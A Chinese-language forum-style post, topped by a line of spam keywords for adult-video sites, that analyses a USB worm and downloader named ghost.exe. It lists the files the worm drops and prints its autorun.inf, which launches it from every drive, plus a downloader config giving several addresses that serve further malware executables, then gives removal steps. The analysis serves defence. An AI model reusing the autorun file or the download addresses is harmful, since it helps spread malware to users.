亚洲自拍另类-亚洲资源最新版在线观看-亚洲资源在线视频-亚洲资源在线观看-亚洲资源在线播放-亚洲专区中文字幕

今天吃飯前..接到某位mm 求助..說電腦又中毒了..
按照習慣先叫他掃個SREng 的 log 看看..意外的發現了個 ghost.exe 和四五個小病毒..
就跟她拿了 ghost.exe 看看.. 又是一個 U 盤病毒 還會下載病毒..

現在寫一點點的小分析 ..目前瑞星不報..在線掃了掃發現就幾家報了..

運行ghost.exe 后..
生成
ghost.exe.bat(刪除自身)
C:\WINDOWS\system\conime.exe
C:\Program Files\WinRAR\WinRAR.exe.tmp

每個盤符下釋放(c d e f g h j k )
autorun.inf
ghost.exe

autorun.inf 文件內容
[AutoRun]
OPEN=ghost.exe
shellexecute=ghost.exe
shell\打開(O)\command=ghost.exe

連入下載..
ie.txt 內容
[main]
服務文件更新=5
服務文件地址=http://www.86dy.net/c123.exe

下載者是否更新=4
下載個數=7

文件1=http://222.220.16.185/data6/jwm.exe
更新1=6
文件2=http://222.220.16.185/data6/wol.exe
更新2=6
文件3=http://222.220.16.185/data6/wo3.exe
更新3=6
文件4=http://222.220.16.185/data6/mir.exe
更新4=6
文件5=http://222.220.16.185/data6/mhh.exe
更新5=6
文件6=http://222.220.16.181/ienet.exe
更新6=6
文件7=http://222.220.16.185/data6/zt3.exe
更新7=6

這些網址都是下載下來的U盤病毒..

沒寫入注冊表..

但是我用反匯編看了看..
這玩意應該修改了
訊雷 QQ WINRAR 的注冊表 ..

處理方法(不包括下載下來的U盤病毒)
右鍵=>打開進入每個盤符=>刪除
autorun.inf
ghost.exe

刪除文件
C:\WINDOWS\system\conime.exe

建議重裝 qq 訊雷 WINRAR